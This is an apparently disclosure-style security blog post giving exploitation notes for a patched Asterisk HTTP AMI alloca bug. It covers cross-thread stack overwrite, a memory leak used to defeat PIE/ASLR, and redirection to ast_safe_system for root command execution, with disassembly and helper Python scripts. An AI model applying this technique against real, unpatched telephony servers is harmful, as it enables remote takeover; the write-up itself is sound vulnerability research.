DoS? Then Who Was Phone?

Introduction

This post presents exploitation notes on a vulnerability we discovered in Asterisk, an open source telephony solution produced by Digium. We reported this bug to Digium on November 27th, 2012, and provided it to customers of the Exodus Intelligence Feed as EIP-2012-0008. Digium released the advisory AST-2012-014 for this vulnerability on January 2nd, 2013, which was picked up shortly after by some of the aggregator sites and incorrectly categorized as a denial-of-service; however, this bug is certainly exploitable. As we found it fun to analyze, and since discussions about server-side memory bugs are a little sparse nowadays, we thought it would be cool to share for others who might also find it interesting.

Vulnerability

The vulnerability resides in the HTTP Asterisk Management Interface (AMI) service, and is the result of an alloca being used to “allocate” memory with a remotely-supplied, untrusted size value. The vulnerability is present in the Asterisk source code file main/http.c, specifically in the function ast_http_get_post_vars, which as the name would suggest is used to parse HTTP POST variable data. A snip of the pertinent vulnerable code in this function is shown below:

struct ast_variable *ast_http_get_post_vars(
  struct ast_tcptls_session_instance *ser, struct ast_variable *headers)
{
  int content_length = 0;
  struct ast_variable *v, *post_vars=NULL, *prev = NULL;
  char *buf, *var, *val;

  for (v = headers; v; v = v->next) {
    if (!strcasecmp(v->name, "Content-Type")) {
      if (strcasecmp(v->value, "application/x-www-form-urlencoded")) {
        return NULL;
      }
      break;
    }
  }

  for (v = headers; v; v = v->next) {
    if (!strcasecmp(v->name, "Content-Length")) {
      content_length = atoi(v->value) + 1;
      break;
    }
  }

  if (!content_length) {
    return NULL;
  }

  if (!(buf = alloca(content_length))) {
    return NULL;
  }
  if (!fgets(buf, content_length, ser->f)) {
    return NULL;
  }

The code shows the length value being converted from the Content-Length string using atoi, then incremented by one and stored in the content_length variable. Memory is obtained by alloca for the expected content length, and pointed to by *buf. Finally, fgets is called to read the expected amount of content data into this buffer. I found it interesting that the code looks as though it may have been written with memory management issues in mind, as the check to ensure content_length is not zero would catch an integer overflow caused by adding one to the value.
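To make that arithmetic concrete, here is a minimal Python sketch of how the parsed length behaves as a 32-bit signed int. The helper names (to_int32, parse_content_length) are mine, not Asterisk's, and the model assumes the header is a plain decimal string that atoi can represent in 32 bits. It only mirrors the "+ 1" and the zero check from the snippet above.

```python
def to_int32(value):
    """Wrap an integer to a signed 32-bit value, as a C int behaves on this target."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def parse_content_length(header_value):
    """Model of `content_length = atoi(v->value) + 1` followed by the zero check.

    Returns None where the C code would return NULL, otherwise the value
    that would be handed to alloca and fgets.
    Assumption: header_value is a decimal string that fits in 32 bits.
    """
    content_length = to_int32(int(header_value) + 1)
    if content_length == 0:
        return None
    return content_length


if __name__ == "__main__":
    for header in ["-1", "16", "245760", "-2"]:
        print(header, "->", parse_content_length(header))
```

In this model a Content-Length of -1 is caught by the zero check, but nothing bounds the value otherwise: large positive values and other negative values pass straight through.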

Below is a snip of disassembled code for the vulnerable function as compiled in the Asterisk package shipped with Ubuntu. This snip shows the size value being set and then subtracted from the stack pointer (ESP) to “allocate” stack memory:

<ast_http_get_post_vars+187>:   call   <strtol@plt>
<ast_http_get_post_vars+192>:   mov    edx,eax
<ast_http_get_post_vars+194>:   add    edx,0x1
<ast_http_get_post_vars+197>:   je     <ast_http_get_post_vars+408>
<ast_http_get_post_vars+203>:   mov    ecx,DWORD PTR [ebp-0x30]
<ast_http_get_post_vars+206>:   add    eax,0x1f
<ast_http_get_post_vars+209>:   and    eax,0xfffffff0
<ast_http_get_post_vars+212>:   sub    esp,eax <----- LOL
<ast_http_get_post_vars+214>:   lea    esi,[esp+0x1b]

As shown, the alloca is compiled into a simple set of instructions to ADD and AND-off the size to be allocated from the stack. It then subtracts the revised size from the stack pointer, and stores an address derived from this into the ESI register for further use.
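The ADD/AND/SUB sequence is easy to replay by hand. The sketch below is a small Python model of just the instructions visible in the listing (add eax,0x1f / and eax,0xfffffff0 / sub esp,eax) using 32-bit wrap-around arithmetic. The function name alloca_adjust and the starting ESP value are made up for illustration, and anything the compiled code does after the lea is not modeled.

```python
MASK32 = 0xFFFFFFFF


def alloca_adjust(esp, parsed_length):
    """Replay the listing: eax = parsed_length; eax += 0x1f; eax &= 0xfffffff0; esp -= eax.

    Returns (size_subtracted, new_esp), both as unsigned 32-bit values.
    """
    size = ((parsed_length & MASK32) + 0x1F) & 0xFFFFFFF0
    new_esp = (esp - size) & MASK32
    return size, new_esp


if __name__ == "__main__":
    esp = 0xB7000000  # hypothetical stack pointer, for illustration only
    for n in (0x10, 0x200, 0x3C900):
        size, new_esp = alloca_adjust(esp, n)
        print("n=0x%x size=0x%x esp=0x%08x" % (n, size, new_esp))
```

The point to take away is that there is no range check anywhere in the sequence: whatever the peer supplies is rounded and subtracted, and the subtraction wraps modulo 2^32.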

Exploitation Obstacles

Since most compilers implement alloca as a fairly direct subtraction of the stack pointer, the exploitation of alloca is often as simple as providing a size value large enough to wrap the stack pointer around to a desirable location higher on the stack. Subsequent use of the pointer to store remotely supplied data would then result in stack memory corruption, and allow for vanilla exploitation techniques to gain control of program execution flow.

However, here the vulnerable code uses the function fgets to read network data into the obtained memory space. This complicates the situation for exploitation as the libc implementation of fgets performs a check on its length argument to ensure that it is not beyond the signed integer boundary of 0x7FFFFFFF. If this check fails, fgets does not read data and returns an error. The code snip below shows the check performed inside of fgets as implemented in libc.so.6:

<fgets+0>:     sub    esp,0x4c
<fgets+3>:     mov    DWORD PTR [esp+0x48],ebp
<fgets+7>:     mov    ebp,DWORD PTR [esp+0x54]
<fgets+11>:    mov    DWORD PTR [esp+0x3c],ebx
<fgets+15>:    call   <mov_esp_ebx>
<fgets+20>:    add    ebx,0x14051c
<fgets+26>:    mov    DWORD PTR [esp+0x40],esi
<fgets+30>:    mov    esi,DWORD PTR [esp+0x58]
<fgets+34>:    test   ebp,ebp
<fgets+36>:    mov    DWORD PTR [esp+0x44],edi
<fgets+40>:    jle    <fgets+336>
...
<fgets+336>:   mov    DWORD PTR [esp+0x50],0x0
<fgets+344>:   jmp    <fgets+256>
...
<fgets+256>:   mov    eax,DWORD PTR [esp+0x50]
<fgets+260>:   mov    ebx,DWORD PTR [esp+0x3c]
<fgets+264>:   mov    esi,DWORD PTR [esp+0x40]
<fgets+268>:   mov    edi,DWORD PTR [esp+0x44]
<fgets+272>:   mov    ebp,DWORD PTR [esp+0x48]
<fgets+276>:   add    esp,0x4c
<fgets+279>:   ret    

The EBP register, containing the length argument, is checked to be a positive signed value using the TEST and JLE instructions at <fgets+34> and <fgets+40>. If the check fails, the code jumps to return an error, making fgets unusable for exploiting a wrapped stack pointer to overwrite memory with data read from the network. While stack corruption by this means is still possible through the pushing and moving of data to the stack by other compiled code operations, the lack of control and limited set of operations make this approach undesirable.

At this point some might categorize this vulnerability as purely theoretical or possibly even unexploitable. As I hope many readers would agree, a challenge of this nature is always inviting. The Exodus team loves goading and trolling one another in these scenarios, usually with something along the lines of “Yeah, it is probably too tough for you to exploit…” or “you should probably just give up.” The recipient of this pep talk usually proceeds to cry and reevaluate the code until an idea hits them or they decide to resign to a life of PCI compliance auditing. Challenge accepted.

EIP Control

After spending some time analyzing the problem and hating computers, I found a way to exploit this vulnerability. The HTTP listener for the Asterisk Management Interface handles every new connection by creating a new thread to execute a designated worker function to process the request. The code to set up and complete this task is spread out across multiple functions and macros and is a little messy, so we’ll try to keep details to a minimum. The HTTP AMI is started initially by a call chain of functions starting with ast_http_init, which calls __ast_http_load, which then calls ast_tcptls_server_start. The function ast_tcptls_server_start performs standard TCP socket setup operations, and is defined as:

void ast_tcptls_server_start(struct ast_tcptls_session_args *desc)

Despite the name, ast_tcptls_server_start is used for both TLS and non-TLS service setup. The single argument taken by this function is a structure describing aspects of the server to be started. From __ast_http_load, the call looks like:

ast_tcptls_server_start(&http_desc);

The structure http_desc is defined in main/http.c as:

static struct ast_tcptls_session_args http_desc = {
  .accept_fd = -1,
  .master = AST_PTHREADT_NULL,
  .tls_cfg = NULL,
  .poll_timeout = -1,
  .name = "http server",
  .accept_fn = ast_tcptls_server_root,
  .worker_fn = httpd_helper_thread,
};

The .accept_fn is a function pointer for a function to accept the connection, and the .worker_fn is a pointer to the worker function responsible for processing the request once a new thread is created. After more setup code, a new thread is created to accept socket connections by calling the function ast_tcptls_server_root. For each TCP connection accepted on the listening HTTP port (default 8088), ast_tcptls_server_root calls the following thread creation wrapper to create a new thread and eventually call the worker function:

 

...
if (ast_pthread_create_detached_background(&launched, NULL, handle_tcptls_connection, tcptls_session)) {
  ast_log(LOG_WARNING, "Unable to launch helper thread: %s\n", strerror(errno));
  ast_tcptls_close_session_file(tcptls_session);
  ao2_ref(tcptls_session, -1);
}
...

The function ast_pthread_create_detached_background is a macro wrapper for the function ast_pthread_create_stack. The macro definition looks roughly like:

ast_pthread_create_detached_stack(a, b, c, d, AST_BACKGROUND_STACKSIZE, ...)

The important thing to note here is the argument AST_BACKGROUND_STACKSIZE. This is used by the function to set the new thread’s stack size attribute before starting the thread:

pthread_attr_setstacksize(attr, stacksize ? stacksize : AST_STACKSIZE)
...
return pthread_create(thread, attr, start_routine, data);

For builds without low memory restrictions defined, the AST_BACKGROUND_STACKSIZE and the AST_STACKSIZE macros are defined as:

#define AST_BACKGROUND_STACKSIZE AST_STACKSIZE
#define AST_STACKSIZE (((sizeof(void *) * 8 * 8) - 16) * 1024) /* becomes 0x3C000 */

The use of AST_STACKSIZE, or 0x3C000, to set the size of the stack for each new HTTP thread is significant, as it means the stack of the newly created thread will begin at 0x3C000 below the top of the previous thread’s stack. In turn, if a value of this size or greater is used for alloca pointer subtraction, the resulting stack pointer will overlap with the stack memory of a newer thread. By carefully synchronizing the state of the threads involved so they do not collide in their shared use of stack memory, it is possible to use this behavior to overwrite the contents of one thread’s stack area with network data read by another thread. To visualize this, and because I love drawing stack diagrams, I present the following bad art:

By offsetting from the higher stack by 0x3C000, the stack pointer will be at the equivalent location in the lower stack
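For readers who prefer numbers to bad art, the following Python sketch evaluates the AST_STACKSIZE macro for a 32-bit build and checks where a pointer lands after a large alloca. It is an idealized model: it assumes consecutive thread stacks sit exactly AST_STACKSIZE apart, as described above, and the function name overlaps_lower_stack is mine.

```python
POINTER_SIZE = 4  # assumption: 32-bit build, matching the disassembly shown earlier

# Same expression as the C macro: (((sizeof(void *) * 8 * 8) - 16) * 1024)
AST_STACKSIZE = ((POINTER_SIZE * 8 * 8) - 16) * 1024


def overlaps_lower_stack(depth_in_own_stack, alloca_size, stack_size=AST_STACKSIZE):
    """Return how far below the *next* thread's stack top the pointer lands.

    depth_in_own_stack: bytes already used below the top of the current thread's stack.
    Returns None if the pointer stays inside the current thread's own stack.
    """
    depth = depth_in_own_stack + alloca_size
    if depth < stack_size:
        return None
    return depth - stack_size


if __name__ == "__main__":
    print("AST_STACKSIZE = 0x%X" % AST_STACKSIZE)
    print(overlaps_lower_stack(0, 0x1000))    # still inside the first thread's stack
    print(overlaps_lower_stack(0, 0x3C900))   # lands inside the second thread's stack
```

With round numbers and no prior stack usage, a size of 0x3C900 lands 0x900 bytes below the top of the next thread's stack, which is the figure used in the walkthrough that follows.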

Synchronizing the two threads such that they do not collide and clobber each other’s critical stack contents is as simple as not sending data when a given thread is expecting it. While one thread is waiting for data in a blocking read operation, the other thread may be using the stack. Using the HTTP POST method (as is required to trigger the vulnerability) allows for two separate network read operations per thread: one for the initial read of HTTP headers, and a second for reading the HTTP Content-Data. Having two individual network read operations per thread provides enough blocking opportunity to align the augmented stack pointer of the first thread to a desirable location used by the second thread. Better yet, this provides an opportunity to align the pointer of the first thread to a location that is not yet used by the second thread, but will be used once the second thread completes its initial read and resumes execution. The following diagram steps attempt to illustrate this process, ignoring trivial details and using round numbers for simplicity.

1. Two socket connections to the HTTP AMI service are established, causing Asterisk to create two threads to handle the connections. Both threads are expecting HTTP headers and so they are both blocking on a read operation. To depict the state of these threads:

two threads created, with their stacks offset by 0x3C000

2. Thread1 is sent HTTP headers with an HTTP Content-Length string equivalent to 0x3C900. Once headers are received, Thread1’s initial read operation finishes. It performs the alloca, subtracting 0x3C900 from its stack pointer, which places its pointer for *buf at 0x900 bytes down from the top of Thread2’s stack:

Thread1 stack pointer now overlaps with the stack area allocated for thread2

3. Thread1 is then sent approximately 0x700 bytes of the 0x3C900 it is expecting. This advances the *buf pointer index used by fgets up the stack, closer to Thread2’s current stack pointer. Thread1 continues waiting as it has not yet received the full amount of data expected (0x3C900).

The location into *buf is advanced by 0x700, moving it up the stack

4. Thread2, still waiting on its initial network read, is sent HTTP POST headers with a Content-Length string equivalent to approximately 0x200, which it uses for its own alloca, subtracting from its stack pointer. Coordinating this length carefully places it precisely where the *buf pointer in Thread1’s fgets currently points. Thread2 then calls fgets to receive its HTTP Content-Data, causing it to block while waiting to read in data.

The stack frame for the call performed by thread2 sits directly next to the current *buf index of thread1

5. Thread1 is sent 4 more bytes of the data it is waiting to receive, which is stored starting at its current *buf index in fgets, and overwrites where Thread2’s stored return address is for fgets. A return from fgets can then be triggered by sending the remaining data expected, or a newline character, or also by simply closing the connection. Once Thread2 returns, EIP is restored from the overwritten return address value and execution flow is controlled.

Clockwork
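The five steps above can be replayed as plain address arithmetic. The sketch below is a toy Python model, not exploit code: it keeps a bytearray standing in for the top of Thread2's stack and tracks Thread1's write cursor using the same round numbers as the diagrams. The addresses, the class and function names, and the assumption that Thread2's saved return address for fgets sits exactly 0x200 below its stack top are all invented for illustration. Alloca rounding and each thread's real stack usage are ignored.

```python
import struct

STACK_SPACING = 0x3C000  # AST_STACKSIZE on the 32-bit build discussed above
WINDOW = 0x1000          # only the top 0x1000 bytes of Thread2's stack are modeled


class Thread2StackModel:
    """Byte-addressable model of the top WINDOW bytes of Thread2's stack."""

    def __init__(self, top):
        self.top = top
        self.base = top - WINDOW
        self.mem = bytearray(WINDOW)

    def write(self, addr, data):
        off = addr - self.base
        if off < 0 or off + len(data) > WINDOW:
            raise ValueError("write outside modeled window")
        self.mem[off:off + len(data)] = data

    def read_u32(self, addr):
        return struct.unpack_from("<I", self.mem, addr - self.base)[0]


def simulate():
    t1_top = 0xB7000000              # hypothetical top of Thread1's stack
    t2_top = t1_top - STACK_SPACING  # step 1: Thread2's stack starts 0x3C000 lower
    stack2 = Thread2StackModel(t2_top)

    # Step 2: Thread1's alloca(0x3C900) puts buf 0x900 below Thread2's stack top.
    buf = t1_top - 0x3C900
    cursor = buf

    # Step 3: 0x700 bytes arrive; fgets writes upward from buf.
    stack2.write(cursor, b"A" * 0x700)
    cursor += 0x700

    # Step 4: Thread2 blocks in fgets; its saved return address is assumed here.
    ret_slot = t2_top - 0x200
    stack2.write(ret_slot, struct.pack("<I", 0x08048000))  # placeholder legitimate value

    # Step 5: four more bytes from Thread1 land on Thread2's saved return address.
    stack2.write(cursor, struct.pack("<I", 0x41424344))
    return buf, cursor, ret_slot, stack2.read_u32(ret_slot)


if __name__ == "__main__":
    buf, cursor, ret_slot, value = simulate()
    print("buf=0x%08x cursor=0x%08x ret_slot=0x%08x value=0x%08x"
          % (buf, cursor, ret_slot, value))
```

The model only confirms the bookkeeping: after 0x700 bytes the cursor has climbed from 0x900 to 0x200 below Thread2's stack top, so the next four bytes replace whatever Thread2 stored there.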

Protection Mechanisms

Precisely overwriting only desired stack contents leaves stack canaries intact so that they do not interfere with exploitation. To avoid non-executable memory protections, typical return-oriented techniques may be employed to reuse existing executable memory once execution flow is controlled. This leaves Address Space Layout Randomization (ASLR), and more specifically, Asterisk builds compiled as Position-Independent-Executables (PIE) as the only remaining obstacle to overcome, as fixed return locations cannot be used in this case.

While the default Makefile generated to compile Asterisk from source does not include flags for PIE, popular Linux distributions may package their own Asterisk builds compiled with PIE for extra security, such as with Ubuntu (props to @kees_cook for keeping us on our toes with this). ASLR via PIE significantly frustrates exploitation. Since Ubuntu is a popular distribution, and having set the bar for difficulty in this case, the Ubuntu Asterisk build is the target we challenged ourselves with.

Who Was Phone

I will save you from babble about entropy and efforts made to try and guess addresses in the presence of ASLR. Instead we will discuss how this vulnerability can be reliably exploited for memory disclosure, and used to determine the location of Asterisk code memory to redirect execution to.

The function generic_http_callback in main/manager.c is the URL handling function executed when triggering the vulnerability, and is defined as:

static int generic_http_callback(struct ast_tcptls_session_instance *ser,
             enum ast_http_method method,
             enum output_format format,
             struct sockaddr_in *remote_address, const char *uri,
             struct ast_variable *get_params,
             struct ast_variable *headers)
{

Above you can see the output_format argument format is an enumeration value for one of the possible formats used for the reply. Its expected possible values are 0, 1, or 2 for “plain”, “html”, “xml” respectively. This value is used to retrieve a pointer from a global array when constructing a response in generic_http_callback:

 

/* ... */
  ast_str_append(&http_header, 0,
    "Content-type: text/%s\r\n"
    "Cache-Control: no-cache;\r\n"
    "Set-Cookie: mansession_id=\"%08x\"; Version=1; Max-Age=%d\r\n"
    "Pragma: SuppressEvents\r\n",
    contenttype[format],
    session->managerid, httptimeout);
/* ... */
  ast_http_send(ser, method, 200, NULL, http_header, out, 0, 0);
/* ... */

The contenttype array contains the pointers to the strings used for the HTTP response, and thus the pointer retrieved from this look-up directly influences data sent back to the HTTP user. By conducting the same style of stack pointer manipulation previously described, it is possible to align a thread’s *buf pointer to overwrite the stack memory where format is stored, so it indexes beyond the contenttype array into other memory. With the help of some handy debugger scripting, I was able to find a pointer->pointer->code from a relative offset of contenttype. My code to do this with VDB is shown below. (Comments document the code a little bit, but a more extensive explanation of VDB is beyond the scope of this post):

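import struct

# `trace` and `ispoi` are not defined here; they are assumed to be
# supplied by the VDB scripting environment
for m in trace.getMemoryMaps():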

  # check memory map name
  if m[3].lower() == "/usr/sbin/asterisk":

    #  check for flags Read & Write for data segment
    if m[2] == 6:
      addr = m[0]
      memlen = m[1]
      memory = trace.readMemory(addr, memlen)
  
    # check for Execute flag
    elif m[2] == 5:
      # save beginning and ending of executable memory
      code = m[0]
      codestop = code+m[1]

# from each offset in the memory
for offset in range(memlen-4):

  # read for the size of a pointer
  ptr = struct.unpack("<I", memory[offset:offset+4])[0]

  # check if it is a pointer
  if ispoi(ptr):
    # read the value at the pointer
    ptr = struct.unpack("<I", trace.readMemory(ptr, 4))[0]

    # is that value in the asterisk code?
    if ptr > code and ptr < codestop:
      print("[*] Found 0x%08x -> 0x%08x" % (addr+offset, ptr))

The script simply searches the memory maps of the attached process for the Asterisk data and code memory regions. Once they are found, the value at every possible offset in the data map is checked to be a valid memory address. If it passes this check, the value at the memory it points to is then checked to see if it is a pointer into code memory, and valid matches are printed. This script identified 8 locations of usable pointers when run against Ubuntu’s packaged Asterisk binary.
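If you do not have VDB handy, the same search can be tried against a synthetic memory image. The Python sketch below is a stand-alone model of the idea, not the script used against Asterisk: FakeMemory, find_pointer_chains, format_index and every address in demo are invented for illustration. It also adds one step the VDB script leaves implicit, which is converting a hit into an array index. That conversion assumes 4-byte pointers and only works for slots aligned to the array base.

```python
import struct


class FakeMemory:
    """Tiny stand-in for a debugger's memory view: a list of (base, bytes) regions."""

    def __init__(self, regions):
        self.regions = regions

    def is_mapped(self, addr, size=4):
        return any(base <= addr and addr + size <= base + len(blob)
                   for base, blob in self.regions)

    def read_u32(self, addr):
        for base, blob in self.regions:
            if base <= addr and addr + 4 <= base + len(blob):
                return struct.unpack_from("<I", blob, addr - base)[0]
        raise ValueError("unmapped address 0x%08x" % addr)


def find_pointer_chains(mem, data_base, data_len, code_start, code_end):
    """Find data slots holding a pointer to memory that itself holds a code address."""
    hits = []
    for offset in range(data_len - 3):
        slot = data_base + offset
        first = mem.read_u32(slot)
        if not mem.is_mapped(first):
            continue
        second = mem.read_u32(first)
        if code_start <= second < code_end:
            hits.append((slot, second))
    return hits


def format_index(slot, array_base, pointer_size=4):
    """Index i such that array_base[i] reads `slot`, or None if the slot is unaligned."""
    delta = slot - array_base
    if delta % pointer_size:
        return None
    return delta // pointer_size


def demo():
    code_base, data_base, heap_base = 0x08048000, 0x0804A000, 0x09000000
    data = bytearray(64)
    heap = bytearray(64)
    struct.pack_into("<I", data, 0x20, heap_base + 0x10)  # data slot -> heap
    struct.pack_into("<I", heap, 0x10, code_base + 0x123)  # heap word -> code
    mem = FakeMemory([(code_base, bytes(0x1000)),
                      (data_base, bytes(data)),
                      (heap_base, bytes(heap))])
    return find_pointer_chains(mem, data_base, len(data), code_base, code_base + 0x1000)


if __name__ == "__main__":
    for slot, code_ptr in demo():
        print("[*] Found 0x%08x -> 0x%08x (index %s)"
              % (slot, code_ptr, format_index(slot, 0x0804A000)))
```

Keep in mind that the leaked bytes are emitted through a %s format, so in the real target a zero byte inside the leaked address would truncate what comes back.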

By overwriting the saved format variable with an index to offset to one of these pointer sequences, it is possible to manufacture a remote memory disclosure and determine an address of Asterisk code memory. Putting this all together allows for successful remote arbitrary code execution despite ASLR/PIE/NX/STACK COOKIES/ALL_OF_THE_THINGS compiled in with the Ubuntu build. To add to an already silly amount of convenience with the conditions surrounding this bug, when gaining EIP control through the method described, the next value on the stack above the overwritten return address is a pointer to the buffer passed to fgets in the second thread. This buffer is populated with the second thread’s received HTTP Content-Data (remotely-controlled data). Using the memory disclosure to calculate the address of a call to the function ast_safe_system, which takes a single string pointer argument to execute as a command line, it is simple to exploit the return in the second thread to execute arbitrary commands from the Asterisk process, which often runs as root. Using this to spawn a remote shell with Ubuntu’s default dash shell is a little obnoxious, but possible, and an exercise left up to the reader.

Hope you enjoyed the post!

Brandon Edwards
@drraid